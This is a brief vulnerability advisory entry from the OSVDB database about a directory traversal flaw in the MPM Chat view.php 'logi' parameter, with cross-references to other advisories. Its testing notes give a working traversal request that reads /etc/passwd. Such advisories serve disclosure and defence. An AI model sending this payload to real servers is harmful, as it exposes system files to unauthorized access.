MPM Chat view.php logi Variable Traversal Arbitrary File Access

2007-03-17T09:48:49
ID OSVDB:34278
Type osvdb
Reporter OSVDB
Modified 2007-03-17T09:48:49

Description

Manual Testing Notes

/[path]/view.php?logi=../../../../../etc/passwd

References:

Secunia Advisory ID:24576 Generic Exploit URL: http://milw0rm.com/exploits/3503 FrSIRT Advisory: ADV-2007-1008 CVE-2007-1613 Bugtraq ID: 23009